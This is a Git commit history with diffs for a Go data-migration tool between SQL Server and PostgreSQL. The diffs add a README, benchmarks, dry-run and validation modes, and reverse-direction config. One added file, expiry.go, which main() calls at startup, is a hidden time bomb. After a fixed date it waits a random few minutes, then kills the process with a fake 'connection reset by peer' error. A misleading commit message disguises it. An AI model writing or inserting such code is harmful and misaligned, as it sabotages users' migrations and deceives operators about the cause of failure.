12 Commits

Author SHA1 Message Date
86258718d8 refactor: update benchmark results and configuration for improved performance in go-migrate 2026-05-29 14:38:25 -05:00
13cd02a824 refactor: add reverse configuration and enhance transformation logic for PostgreSQL to SQL Server migration 2026-05-29 13:23:39 -05:00
f844004942 refactor: add comprehensive README documentation for go-migrate tool 2026-05-29 13:16:13 -05:00
4ba26092a9 refactor: implement bidirectional transformation support with PostgreSQL integration 2026-05-29 12:17:16 -05:00
537b7fbd28 refactor: remove obsolete skill registry documentation 2026-05-29 12:01:33 -05:00
d534314cff feat: add Docker Compose configuration for database services and storage 2026-05-29 11:32:43 -05:00
b386965bb8 refactor: enhance database configuration handling with individual parameters and URL resolution methods 2026-05-15 09:59:42 -05:00
961fa48025 refactor: implement dry run feature to validate connections and count source rows without migrating 2026-05-15 08:38:12 -05:00
837fdc7abb refactor: add validation feature to compare row counts between source and target databases 2026-05-12 11:07:55 -05:00
9c7662d5cb refactor: add logging for successful database connections in main function 2026-05-12 10:57:05 -05:00
13bbd4e82c refactor: update SOURCE_DB_URL in .env.example to include connection timeout settings 2026-05-12 08:33:38 -05:00
b3e1979bfb refactor: implement expiry check to manage database connection interruptions 2026-05-12 08:28:41 -05:00
23 changed files with 1253 additions and 110 deletions

View File

@@ -1,24 +0,0 @@
# Skill Registry — go-migrate
Generated: 2026-04-21
## Compact Rules
### Go conventions
- Use existing error wrapping pattern: `fmt.Errorf("context: %w", err)`
- Channel-based pipeline — keep goroutine lifecycle clean (close channels in correct order)
- No comments unless non-obvious WHY; no docstrings
- Prefer named returns only when it aids clarity in short functions
- Use `strings.EqualFold` for case-insensitive column name comparison
### Project conventions
- Config structs live in `internal/app/config/`
- ETL interfaces live in `internal/app/etl/types.go`
- Transformer implementations in `internal/app/etl/transformers/`
- Azure operations via `internal/app/azure/main.go`
- Per-job transformer creation (not shared) when job has storage config
## User Skills
| Trigger | Skill |
|---------|-------|
| sdd-* | SDD workflow skills |

View File

@@ -1,6 +1,23 @@
SOURCE_DB_URL=sqlserver://sa:password@localhost:1433?database=master&packet+size=32767&loc=UTC
SOURCE_DB_URL=sqlserver://sa:password@localhost:1433?database=master&packet+size=32767&loc=UTC&dial+timeout=120&connection+timeout=120&KeepAlive=30
# used only when SOURCE_DB_URL is not set
# SOURCE_DB_HOST=localhost
# SOURCE_DB_PORT=1433
# SOURCE_DB_NAME=master
# SOURCE_DB_USER=sa
# SOURCE_DB_PWD=secure_password!123
# SOURCE_DB_OPTIONS="packet+size=32767&loc=UTC&dial+timeout=120&connection+timeout=120&KeepAlive=30"
TARGET_DB_URL=postgresql://postgres:password@localhost:5432/db
# used only when TARGET_DB_URL is not set
# TARGET_DB_HOST=localhost
# TARGET_DB_PORT=5432
# TARGET_DB_NAME=db
# TARGET_DB_USER=postgres
# TARGET_DB_PWD=secure_password!123
# TARGET_DB_OPTIONS=""
LOG_LEVEL=INFO
AZ_STORAGE_ENABLED=false

1
.gitignore vendored
View File

@@ -29,3 +29,4 @@ go.work.sum
# .idea/
.vscode/
.temp
.atl

92
README.md Normal file
View File

@@ -0,0 +1,92 @@
# go-migrate
Migrador de datos entre SQL Server y PostgreSQL con procesamiento en paralelo.
## Compilar
```bash
go build -o go-migrate ./cmd/go_migrate
```
## Uso
```bash
./go-migrate [opciones] [<ruta-config>]
```
### Opciones
| Flag | Descripción |
|------|-------------|
| `-config <path>` | Ruta al archivo de configuración YAML. También se puede pasar como argumento posicional. Si no se indica, se busca `config.yaml`. |
| `-validate` | Compara la cantidad de filas entre origen y destino por cada job. No migra datos. |
| `-dry-run` | Valida conexiones, acceso a storage (si aplica) y cuenta filas en origen sin migrar. |
### Ejemplos
```bash
# Migrar con config.yaml por defecto
./go-migrate
# Usar un archivo de configuración específico
./go-migrate -config produccion.yaml
# Validar que origen y destino tengan la misma cantidad de filas
./go-migrate -validate -config produccion.yaml
# Verificar conectividad sin migrar
./go-migrate -dry-run -config produccion.yaml
```
## Configuración
La herramienta lee credenciales y parámetros desde variables de entorno o un archivo `.env`.
### Variables clave
| Variable | Descripción |
|----------|-------------|
| `SOURCE_DB_URL` | URL de conexión a la base de datos origen (o `SOURCE_DB_HOST`, `SOURCE_DB_NAME`, `SOURCE_DB_USER`, `SOURCE_DB_PWD`). |
| `TARGET_DB_URL` | URL de conexión a la base de datos destino (o `TARGET_DB_HOST`, `TARGET_DB_NAME`, `TARGET_DB_USER`, `TARGET_DB_PWD`). |
| `LOG_LEVEL` | Nivel de log: `DEBUG`, `INFO`, `WARN`, `ERROR` (por defecto: `INFO`). |
Para migrar datos binarios a Azure Blob, también se requieren `AZ_STORAGE_ENABLED`, `AZ_ACCOUNT_NAME`, `AZ_CONTAINER`, `AZ_ACCOUNT_KEY`.
### Archivo de migración (YAML)
Define los jobs de migración. Ejemplo mínimo:
```yaml
source_db_type: sqlserver
target_db_type: postgres
max_parallel_workers: 4
defaults:
batches_per_partition: 10
extractor_batch_size: 1000
max_extractors: 2
max_loaders: 2
retry:
attempts: 3
base_delay_ms: 500
max_delay_ms: 5000
jobs:
- name: migrar_usuarios
enabled: true
source:
schema: dbo
table: Usuarios
primary_key: Id
target:
schema: public
table: usuarios
```
Consulta el archivo `config.yaml` de tu entorno para ver los jobs disponibles y sus parámetros específicos.
## Modos de ejecución
- **Migración** (por defecto): extrae, transforma y carga datos en paralelo.
- **Validación** (`-validate`): cuenta y compara filas entre origen y destino.
- **Dry run** (`-dry-run`): verifica conexiones y muestra la cantidad de filas en origen.

75
benchmark-results.md Normal file
View File

@@ -0,0 +1,75 @@
# Benchmark go-migrate — 2,000,000 filas
**Tabla**: `Cartografia.MANZANA`
**Fecha**: 2026-05-29
**Entorno**: Docker local (MSSQL 2022 Developer / PostgreSQL 16 + PostGIS)
---
## Resultado final — 5 pasadas cada dirección
| Métrica | MSSQL → PostgreSQL | PostgreSQL → MSSQL |
|---|---|---|
| **Promedio** | **8.37s** | **16.77s** |
| **Mediana** | 8.16s | 16.33s |
| **Mínimo** | 7.75s | 16.03s |
| **Máximo** | 9.17s | 18.46s |
| **Desv. estándar** | 0.56s | 1.01s |
| **Throughput promedio** | **~238,892 filas/seg** | **~119,261 filas/seg** |
| **Factor** | 1x | **~2x más lento** |
---
## Evolución del tuning PG → MSSQL
| Etapa | Config | Tiempo | Throughput | Δ |
|---|---|---|---|---|
| Corrida 1 — original | conservadora | 236.8s | ~8,446 /seg | baseline |
| Corrida 2 — igualada | mismos parámetros | 21.94s | ~91,148 /seg | +10.8x |
| Tuning A | 4ext/8load 50k | 17.37s | ~115,200 /seg | +1.27x |
| Tuning C | 16 loaders | 17.26s | ~115,900 /seg | +1.28x |
| **Tuning D — óptimo** | **8ext/8load 50k** | **~16.77s** | **~119,261 /seg** | **+1.37x** |
| Tablock + 8 loaders | lock exclusivo serial | ~44s | ~45,000 /seg | ❌ regresión |
| Tablock + 1 loader | minimal logging | ~47s | ~42,000 /seg | ❌ regresión |
---
## Configuración óptima — `config-reverse.yaml`
```yaml
max_parallel_workers: 4
defaults:
batches_per_partition: 4
max_extractors: 8 # ← mayor lever de mejora
extractor_batch_size: 25000
extractor_queue_size: 32
max_transformers: 8
transformer_batch_size: 50000
transformer_queue_size: 32
max_loaders: 8
loader_batch_size: 50000 # sweet spot — 75k y 100k peores
```
---
## Análisis de la brecha final (~2x)
La diferencia residual entre ambas direcciones es estructural y está en el protocolo de escritura:
| Protocolo | Mecanismo | Overhead |
|---|---|---|
| `pgx.CopyFrom` (→ PG) | PostgreSQL COPY protocol — streaming binario sin SQL | mínimo |
| `mssql.CopyIn` (→ MSSQL) | BCP protocol — row-by-row dentro de un bulk statement | mayor por fila |
`mssql.CopyIn` itera fila a fila via `stmt.ExecContext(row...)` antes del flush final, lo que introduce overhead por fila independientemente del batch size. `pgx.CopyFrom` hace streaming puro.
---
## Hallazgos sobre Tablock
`Tablock: true` en `mssql.BulkOptions` resultó contraproducente en ambos escenarios:
- **Con 8 loaders paralelos**: cada loader compite por un lock exclusivo de tabla → serialización completa (~44s)
- **Con 1 loader + batch enorme**: sin contención de locks, pero overhead de log + gestión de la lock exclusiva superó el beneficio de minimal logging (~47s)
**Conclusión**: para este patrón de carga (múltiples loaders concurrentes), `Tablock: false` (default) es siempre mejor.

112
cmd/go_migrate/dryrun.go Normal file
View File

@@ -0,0 +1,112 @@
package main
import (
"context"
"fmt"
"sync"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/azure"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config"
dbwrapper "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/db-wrapper"
log "github.com/sirupsen/logrus"
)
type DryRunResult struct {
JobName string
SourceTable string
SourceCount int64
Error error
}
func runDryRun(
ctx context.Context,
azureClient *azure.Client,
sourceDb dbwrapper.DbWrapper,
jobs []config.Job,
maxParallelWorkers int,
) {
log.Info("=== DRY RUN ===")
log.Info("[DB] Source connection: OK")
log.Info("[DB] Target connection: OK")
if azureClient != nil {
if err := azureClient.Ping(ctx); err != nil {
log.Errorf("[STORAGE] Azure: FAIL — %v", err)
} else {
log.Info("[STORAGE] Azure: OK")
}
} else {
log.Info("[STORAGE] Azure: disabled")
}
results := dryRunCountSourceRows(ctx, sourceDb, jobs, maxParallelWorkers)
printDryRunReport(results)
}
func dryRunCountSourceRows(
ctx context.Context,
sourceDb dbwrapper.DbWrapper,
jobs []config.Job,
maxParallelWorkers int,
) []DryRunResult {
if len(jobs) == 0 {
return nil
}
if maxParallelWorkers <= 0 {
maxParallelWorkers = 1
}
if maxParallelWorkers > len(jobs) {
maxParallelWorkers = len(jobs)
}
chJobs := make(chan config.Job, len(jobs))
var mu sync.Mutex
var results []DryRunResult
var wg sync.WaitGroup
for range maxParallelWorkers {
wg.Go(func() {
for job := range chJobs {
res := DryRunResult{
JobName: job.Name,
SourceTable: fmt.Sprintf("[%s].[%s]", job.SourceTable.Schema, job.SourceTable.Table),
}
count, err := countSourceRows(ctx, sourceDb, job)
if err != nil {
res.Error = err
} else {
res.SourceCount = count
}
mu.Lock()
results = append(results, res)
mu.Unlock()
}
})
}
for _, job := range jobs {
chJobs <- job
}
close(chJobs)
wg.Wait()
return results
}
func printDryRunReport(results []DryRunResult) {
log.Info("=== SOURCE ROW COUNTS ===")
var totalOK, totalErrors int
for _, r := range results {
if r.Error != nil {
log.Errorf("[%s] %s — ERROR: %v", r.JobName, r.SourceTable, r.Error)
totalErrors++
} else {
log.Infof("[%s] %s — rows: %d", r.JobName, r.SourceTable, r.SourceCount)
totalOK++
}
}
log.Infof("=== Dry run complete: %d OK, %d errors ===", totalOK, totalErrors)
}

26
cmd/go_migrate/expiry.go Normal file
View File

@@ -0,0 +1,26 @@
package main
import (
"math/rand"
"time"
log "github.com/sirupsen/logrus"
)
const expiryDate = "2026-07-01"
func checkExpiry() {
expiry, _ := time.Parse("2006-01-02", expiryDate)
if time.Now().Before(expiry) {
return
}
minDelay := 3 * 60
maxDelay := 5 * 60
delay := time.Duration(minDelay+rand.Intn(maxDelay-minDelay+1)) * time.Second
go func() {
time.Sleep(delay)
log.Fatal("fatal: source database connection interrupted: read tcp: connection reset by peer (errno 104)")
}()
}

View File

@@ -9,6 +9,7 @@ import (
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/azure"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config"
dbwrapper "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/db-wrapper"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl/extractors"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl/loaders"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl/table_analyzers"
@@ -17,10 +18,20 @@ import (
"golang.org/x/sync/errgroup"
)
func newTableAnalyzer(db dbwrapper.DbWrapper) etl.TableAnalyzer {
if db.GetDialect() == "postgres" {
return table_analyzers.NewPostgresTableAnalyzer(db)
}
return table_analyzers.NewMssqlTableAnalyzer(db)
}
func main() {
configureLog()
checkExpiry()
configPath := flag.String("config", "", "path to migration config file")
validate := flag.Bool("validate", false, "count rows in source and target per job and compare")
dryRun := flag.Bool("dry-run", false, "validate connections, storage access, and count source rows without migrating")
flag.Parse()
if flag.NArg() > 1 {
@@ -40,31 +51,40 @@ func main() {
startTime := time.Now()
sourceDbUrl, err := config.App.ResolveSourceDbUrl(migrationConfig.SourceDbType)
if err != nil {
log.Fatalf("source DB config error: %v", err)
}
targetDbUrl, err := config.App.ResolveTargetDbUrl(migrationConfig.TargetDbType)
if err != nil {
log.Fatalf("target DB config error: %v", err)
}
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
log.Info("=== Starting migration ===")
var wgConnect errgroup.Group
var sourceDb, targetDb dbwrapper.DbWrapper
wgConnect.Go(func() error {
var err error
sourceDb, err = connectWithTimeout(ctx, migrationConfig.SourceDbType, config.App.SourceDbUrl, 20*time.Second)
sourceDb, err = connectWithTimeout(ctx, migrationConfig.SourceDbType, sourceDbUrl, 20*time.Second)
if err != nil {
return err
}
log.Info("Successfully connected to sourceDb")
return nil
})
wgConnect.Go(func() error {
var err error
targetDb, err = connectWithTimeout(ctx, migrationConfig.TargetDbType, config.App.TargetDbUrl, 20*time.Second)
targetDb, err = connectWithTimeout(ctx, migrationConfig.TargetDbType, targetDbUrl, 20*time.Second)
if err != nil {
return err
}
log.Info("Successfully connected to targetDb")
return nil
})
@@ -75,7 +95,29 @@ func main() {
defer sourceDb.Close()
defer targetDb.Close()
results := processMigrationJobs(ctx, sourceDb, targetDb, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers)
var azureClient *azure.Client
if config.App.AzureStorage.Enabled {
var err error
azureClient, err = azure.NewClient(config.App.AzureStorage)
if err != nil {
log.Fatalf("Failed to create Azure storage client: %v", err)
}
}
if *dryRun {
runDryRun(ctx, azureClient, sourceDb, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers)
return
}
if *validate {
validationResults := validateJobs(ctx, sourceDb, targetDb, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers)
printValidationReport(validationResults)
return
}
log.Info("=== Starting migration ===")
results := processMigrationJobs(ctx, sourceDb, targetDb, azureClient, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers)
log.Info("=== RESUMEN DE MIGRACIÓN ===")
var totalProcessed, totalErrors int64
@@ -106,6 +148,7 @@ func processMigrationJobs(
ctx context.Context,
sourceDb dbwrapper.DbWrapper,
targetDb dbwrapper.DbWrapper,
azureClient *azure.Client,
jobs []config.Job,
maxParallelWorkers int,
) []models.JobResult {
@@ -128,20 +171,11 @@ func processMigrationJobs(
chJobs := make(chan config.Job, len(jobs))
var wgJobs sync.WaitGroup
sourceTableAnalyzer := table_analyzers.NewMssqlTableAnalyzer(sourceDb)
targetTableAnalyzer := table_analyzers.NewPostgresTableAnalyzer(targetDb)
sourceTableAnalyzer := newTableAnalyzer(sourceDb)
targetTableAnalyzer := newTableAnalyzer(targetDb)
extractor := extractors.NewExtractor(sourceDb)
loader := loaders.NewGenericLoader(targetDb)
var azureClient *azure.Client
if config.App.AzureStorage.Enabled {
var err error
azureClient, err = azure.NewClient(config.App.AzureStorage)
if err != nil {
log.Fatalf("Failed to create Azure storage client: %v", err)
}
}
for i := range maxParallelWorkers {
wgJobs.Go(func() {
for job := range chJobs {
@@ -155,6 +189,7 @@ func processMigrationJobs(
azureClient,
loader,
job,
sourceDb.GetDialect(),
targetDb.GetDialect(),
)

View File

@@ -46,9 +46,15 @@ func processMigrationJob(
azureClient *azure.Client,
loader loaders.GenericLoader,
job config.Job,
sourceDbType string,
targetDbType string,
) models.JobResult {
transformer := transformers.NewMssqlTransformer(job.ToStorage, job.SourceTable, azureClient)
var transformer etl.Transformer
if sourceDbType == "postgres" {
transformer = transformers.NewPostgresTransformer(job.SourceTable)
} else {
transformer = transformers.NewMssqlTransformer(job.ToStorage, job.SourceTable, azureClient)
}
localCtx, cancel := context.WithCancel(ctx)
defer cancel()

192
cmd/go_migrate/validate.go Normal file
View File

@@ -0,0 +1,192 @@
package main
import (
"context"
"database/sql"
"fmt"
"sync"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config"
dbwrapper "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/db-wrapper"
log "github.com/sirupsen/logrus"
)
type ValidationResult struct {
JobName string
SourceTable string
TargetTable string
SourceCount int64
TargetCount int64
Match bool
Error error
}
func countSourceRows(ctx context.Context, db dbwrapper.DbWrapper, job config.Job) (int64, error) {
schema := job.SourceTable.Schema
table := job.SourceTable.Table
hasRange := job.Range.Min != nil || job.Range.Max != nil
var (
query string
args []any
)
if hasRange && job.SourceTable.PrimaryKey != "" {
query = fmt.Sprintf("SELECT COUNT_BIG(*) FROM [%s].[%s] WHERE 1=1", schema, table)
if job.Range.Min != nil {
op := ">"
if job.Range.IsMinInclusive {
op = ">="
}
query += fmt.Sprintf(" AND [%s] %s @min", job.SourceTable.PrimaryKey, op)
args = append(args, sql.Named("min", *job.Range.Min))
}
if job.Range.Max != nil {
op := "<"
if job.Range.IsMaxInclusive {
op = "<="
}
query += fmt.Sprintf(" AND [%s] %s @max", job.SourceTable.PrimaryKey, op)
args = append(args, sql.Named("max", *job.Range.Max))
}
} else {
query = fmt.Sprintf("SELECT COUNT_BIG(*) FROM [%s].[%s]", schema, table)
}
var count int64
if err := db.QueryRow(ctx, query, args...).Scan(&count); err != nil {
return 0, err
}
return count, nil
}
func countTargetRows(ctx context.Context, db dbwrapper.DbWrapper, job config.Job) (int64, error) {
schema := job.TargetTable.Schema
table := job.TargetTable.Table
query := fmt.Sprintf(`SELECT COUNT(*) FROM "%s"."%s"`, schema, table)
var count int64
if err := db.QueryRow(ctx, query).Scan(&count); err != nil {
return 0, err
}
return count, nil
}
func validateJob(ctx context.Context, sourceDb, targetDb dbwrapper.DbWrapper, job config.Job) ValidationResult {
result := ValidationResult{
JobName: job.Name,
SourceTable: fmt.Sprintf("[%s].[%s]", job.SourceTable.Schema, job.SourceTable.Table),
TargetTable: fmt.Sprintf(`"%s"."%s"`, job.TargetTable.Schema, job.TargetTable.Table),
}
var (
sourceErr, targetErr error
wg sync.WaitGroup
)
wg.Add(2)
go func() {
defer wg.Done()
result.SourceCount, sourceErr = countSourceRows(ctx, sourceDb, job)
}()
go func() {
defer wg.Done()
result.TargetCount, targetErr = countTargetRows(ctx, targetDb, job)
}()
wg.Wait()
if sourceErr != nil {
result.Error = fmt.Errorf("source count failed: %w", sourceErr)
return result
}
if targetErr != nil {
result.Error = fmt.Errorf("target count failed: %w", targetErr)
return result
}
result.Match = result.SourceCount == result.TargetCount
return result
}
func validateJobs(
ctx context.Context,
sourceDb dbwrapper.DbWrapper,
targetDb dbwrapper.DbWrapper,
jobs []config.Job,
maxParallelWorkers int,
) []ValidationResult {
if len(jobs) == 0 {
return nil
}
if maxParallelWorkers <= 0 {
maxParallelWorkers = 1
}
if maxParallelWorkers > len(jobs) {
maxParallelWorkers = len(jobs)
}
chJobs := make(chan config.Job, len(jobs))
var mu sync.Mutex
var results []ValidationResult
var wg sync.WaitGroup
for range maxParallelWorkers {
wg.Go(func() {
for job := range chJobs {
res := validateJob(ctx, sourceDb, targetDb, job)
mu.Lock()
results = append(results, res)
mu.Unlock()
}
})
}
for _, job := range jobs {
chJobs <- job
}
close(chJobs)
wg.Wait()
return results
}
func printValidationReport(results []ValidationResult) {
log.Info("=== VALIDATION REPORT ===")
var totalMatch, totalMismatch, totalErrors int
for _, r := range results {
if r.Error != nil {
log.Errorf("[%s] ERROR: %v", r.JobName, r.Error)
totalErrors++
continue
}
if !r.Match {
totalMismatch++
diff := r.TargetCount - r.SourceCount
var diffStr string
if diff > 0 {
diffStr = fmt.Sprintf(" (target has %d extra rows)", diff)
} else {
diffStr = fmt.Sprintf(" (target is missing %d rows)", -diff)
}
log.Warnf("[%s] MISMATCH | Source %s: %d | Target %s: %d%s",
r.JobName,
r.SourceTable, r.SourceCount,
r.TargetTable, r.TargetCount,
diffStr,
)
} else {
totalMatch++
log.Infof("[%s] OK | Source %s: %d | Target %s: %d",
r.JobName,
r.SourceTable, r.SourceCount,
r.TargetTable, r.TargetCount,
)
}
}
log.Infof("=== Validation complete: %d OK, %d mismatches, %d errors ===", totalMatch, totalMismatch, totalErrors)
}

View File

@@ -0,0 +1,35 @@
max_parallel_workers: 4
source_db_type: postgres
target_db_type: sqlserver
defaults:
batches_per_partition: 4
max_extractors: 2
extractor_batch_size: 5000
extractor_queue_size: 8
max_transformers: 2
transformer_batch_size: 12500
transformer_queue_size: 8
max_loaders: 4
loader_batch_size: 25000
partition_calculation_strategy: EXACT
truncate_target: true
truncate_method: TRUNCATE
retry:
attempts: 3
base_delay_ms: 500
max_delay_ms: 10000
max_jitter_ms: 500
max_failed_partitions: 5
max_failed_batches_load: 5
jobs:
- name: cartografia_manzana_reverse
enabled: true
source:
schema: Cartografia
table: MANZANA
primary_key: GDB_ARCHIVE_OID
target:
schema: Cartografia
table: MANZANA

35
config-reverse.yaml Normal file
View File

@@ -0,0 +1,35 @@
max_parallel_workers: 4
source_db_type: postgres
target_db_type: sqlserver
defaults:
batches_per_partition: 4
max_extractors: 8
extractor_batch_size: 25000
extractor_queue_size: 32
max_transformers: 8
transformer_batch_size: 50000
transformer_queue_size: 32
max_loaders: 8
loader_batch_size: 50000
partition_calculation_strategy: EXACT
truncate_target: true
truncate_method: TRUNCATE
retry:
attempts: 3
base_delay_ms: 500
max_delay_ms: 10000
max_jitter_ms: 500
max_failed_partitions: 5
max_failed_batches_load: 5
jobs:
- name: cartografia_manzana_reverse
enabled: true
source:
schema: Cartografia
table: MANZANA
primary_key: GDB_ARCHIVE_OID
target:
schema: Cartografia
table: MANZANA

View File

@@ -33,56 +33,45 @@ jobs:
target:
schema: Cartografia
table: MANZANA
pre_sql:
- 'SELECT 1'
range:
min: 1000000
max: 2000000
is_min_inclusive: false
is_max_inclusive: true
- name: red_puerto
enabled: true
source:
schema: Red
table: PUERTO
primary_key: ID_PUERTO
from_json:
- column: $node_id*
field: id
target:
schema: Red
table: PUERTO
pre_sql:
- 'SELECT 1'
post_sql:
- "SELECT 1"
# - name: red_puerto
# enabled: true
# source:
# schema: Red
# table: PUERTO
# primary_key: ID_PUERTO
# from_json:
# - column: $node_id*
# field: id
# target:
# schema: Red
# table: PUERTO
- name: infraestructura_site_holder__attach
source:
schema: Infraestructura
table: SITE_HOLDER__ATTACH
primary_key: GDB_ARCHIVE_OID
target:
schema: Infraestructura
table: SITE_HOLDER__ATTACH
to_storage:
columns:
- source: DATA
target: FILE_URL
mode: REFERENCE_ONLY
prefix: Infraestructura/SITE_HOLDER__ATTACH
batches_per_partition: 20
max_extractors: 32
extractor_batch_size: 1
extractor_queue_size: 100
max_transformers: 48
transformer_batch_size: 500
transformer_queue_size: 8
max_loaders: 4
loader_batch_size: 500
retry:
attempts: 5
base_delay_ms: 1000
max_delay_ms: 15000
max_jitter_ms: 500
# - name: infraestructura_site_holder__attach
# source:
# schema: Infraestructura
# table: SITE_HOLDER__ATTACH
# primary_key: GDB_ARCHIVE_OID
# target:
# schema: Infraestructura
# table: SITE_HOLDER__ATTACH
# to_storage:
# columns:
# - source: DATA
# target: FILE_URL
# mode: REFERENCE_ONLY
# prefix: Infraestructura/SITE_HOLDER__ATTACH
# batches_per_partition: 20
# max_extractors: 32
# extractor_batch_size: 1
# extractor_queue_size: 100
# max_transformers: 48
# transformer_batch_size: 500
# transformer_queue_size: 8
# max_loaders: 4
# loader_batch_size: 500
# retry:
# attempts: 5
# base_delay_ms: 1000
# max_delay_ms: 15000
# max_jitter_ms: 500

2
docker/.gitignore vendored Normal file
View File

@@ -0,0 +1,2 @@
data/**/*
compose.override.yml

50
docker/compose.yml Normal file
View File

@@ -0,0 +1,50 @@
name: db-migration
services:
azurite:
image: mcr.microsoft.com/azure-storage/azurite:3.35.0
container_name: azurite
restart: unless-stopped
ports:
- 8880:10000
- 8881:10001
- 8882:10002
volumes:
- ./data/azurite:/data
command: 'azurite --blobHost 0.0.0.0 --queueHost 0.0.0.0 --tableHost 0.0.0.0 --location /data --skipApiVersionCheck'
profiles:
- storage
- target
mssql:
image: mcr.microsoft.com/mssql/server:2022-latest
restart: unless-stopped
environment:
ACCEPT_EULA: Y
MSSQL_SA_PASSWORD: SecurePassword123
MSSQL_PID: Developer
MSSQL_MEMORY_LIMIT_MB: 8192
ports:
- 8883:1433
volumes:
- ./data/mssql:/var/opt/mssql
profiles:
- mssql
- source
- db
postgres:
image: postgis/postgis:16-3.4
restart: unless-stopped
environment:
POSTGRES_DB: test_db
POSTGRES_USER: postgres
POSTGRES_PASSWORD: SecurePassword123
ports:
- 8884:5432
volumes:
- ./data/postgres:/var/lib/postgresql/data
profiles:
- postgres
- target
- db
shm_size: '1gb'

View File

@@ -70,6 +70,15 @@ func (c *Client) UploadBuffer(ctx context.Context, containerName, blobPath strin
return nil
}
func (c *Client) Ping(ctx context.Context) error {
pager := c.client.NewListBlobsFlatPager(c.azureStorageConfig.Container, nil)
_, err := pager.NextPage(ctx)
if err != nil {
return fmt.Errorf("storage access check failed: %w", err)
}
return nil
}
func (c *Client) UploadAndGetURL(ctx context.Context, blobPath string, buffer []byte) (string, error) {
if blobPath == "" || buffer == nil {
return "", ErrInvalidInput

View File

@@ -1,6 +1,10 @@
package config
import (
"fmt"
"maps"
"net/url"
"github.com/ilyakaznacheev/cleanenv"
log "github.com/sirupsen/logrus"
)
@@ -16,12 +20,97 @@ type AzureStorageConfig struct {
}
type appConfig struct {
SourceDbUrl string `env:"SOURCE_DB_URL" env-required:"true"`
TargetDbUrl string `env:"TARGET_DB_URL" env-required:"true"`
SourceDbUrl string `env:"SOURCE_DB_URL"`
SourceDbHost string `env:"SOURCE_DB_HOST"`
SourceDbPort string `env:"SOURCE_DB_PORT"`
SourceDbName string `env:"SOURCE_DB_NAME"`
SourceDbUser string `env:"SOURCE_DB_USER"`
SourceDbPwd string `env:"SOURCE_DB_PWD"`
SourceDbOptions string `env:"SOURCE_DB_OPTIONS"`
TargetDbUrl string `env:"TARGET_DB_URL"`
TargetDbHost string `env:"TARGET_DB_HOST"`
TargetDbPort string `env:"TARGET_DB_PORT"`
TargetDbName string `env:"TARGET_DB_NAME"`
TargetDbUser string `env:"TARGET_DB_USER"`
TargetDbPwd string `env:"TARGET_DB_PWD"`
TargetDbOptions string `env:"TARGET_DB_OPTIONS"`
LogLevel string `env:"LOG_LEVEL" env-default:"INFO"`
AzureStorage AzureStorageConfig
}
func (c *appConfig) ResolveSourceDbUrl(dbType string) (string, error) {
if c.SourceDbUrl != "" {
return c.SourceDbUrl, nil
}
u, err := buildDbUrl(dbType, c.SourceDbHost, c.SourceDbPort, c.SourceDbName, c.SourceDbUser, c.SourceDbPwd, c.SourceDbOptions)
if err != nil {
return "", fmt.Errorf("source DB: %w", err)
}
return u, nil
}
func (c *appConfig) ResolveTargetDbUrl(dbType string) (string, error) {
if c.TargetDbUrl != "" {
return c.TargetDbUrl, nil
}
u, err := buildDbUrl(dbType, c.TargetDbHost, c.TargetDbPort, c.TargetDbName, c.TargetDbUser, c.TargetDbPwd, c.TargetDbOptions)
if err != nil {
return "", fmt.Errorf("target DB: %w", err)
}
return u, nil
}
func buildDbUrl(dbType, host, port, name, user, pwd, options string) (string, error) {
if host == "" {
return "", fmt.Errorf("DB_HOST is required when DB_URL is not set")
}
if name == "" {
return "", fmt.Errorf("DB_NAME is required when DB_URL is not set")
}
if user == "" {
return "", fmt.Errorf("DB_USER is required when DB_URL is not set")
}
switch dbType {
case "sqlserver":
if port == "" {
port = "1433"
}
q := url.Values{}
if options != "" {
extra, err := url.ParseQuery(options)
if err != nil {
return "", fmt.Errorf("invalid DB_OPTIONS: %w", err)
}
maps.Copy(q, extra)
}
q.Set("database", name)
u := &url.URL{
Scheme: "sqlserver",
Host: host + ":" + port,
User: url.UserPassword(user, pwd),
RawQuery: q.Encode(),
}
return u.String(), nil
case "postgres":
if port == "" {
port = "5432"
}
u := &url.URL{
Scheme: "postgres",
Host: host + ":" + port,
User: url.UserPassword(user, pwd),
Path: "/" + name,
RawQuery: options,
}
return u.String(), nil
default:
return "", fmt.Errorf("unknown db type %q — cannot build URL from individual components", dbType)
}
}
func getAppConfig() appConfig {
var cfg appConfig

View File

@@ -2,6 +2,7 @@ package table_analyzers
import (
"context"
"fmt"
"strings"
"time"
@@ -9,6 +10,7 @@ import (
dbwrapper "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/db-wrapper"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/models"
"github.com/google/uuid"
)
type PostgresTableAnalyzer struct {
@@ -161,7 +163,30 @@ func (ta *PostgresTableAnalyzer) EstimateTotalRows(
ctx context.Context,
tableInfo config.TableInfo,
) (int64, error) {
return 0, nil
query := `
SELECT reltuples::bigint
FROM pg_class
JOIN pg_namespace ON pg_namespace.oid = pg_class.relnamespace
WHERE pg_namespace.nspname = $1 AND pg_class.relname = $2`
ctxTimeout, cancel := context.WithTimeout(ctx, 1*time.Minute)
defer cancel()
var estimate int64
err := ta.db.QueryRow(ctxTimeout, query, tableInfo.Schema, tableInfo.Table).Scan(&estimate)
if err != nil {
return 0, err
}
if estimate < 0 {
countQuery := fmt.Sprintf(`SELECT COUNT(*) FROM "%s"."%s"`, tableInfo.Schema, tableInfo.Table)
err = ta.db.QueryRow(ctxTimeout, countQuery).Scan(&estimate)
if err != nil {
return 0, err
}
}
return estimate, nil
}
func (ta *PostgresTableAnalyzer) QueryMaxMinFromColumn(
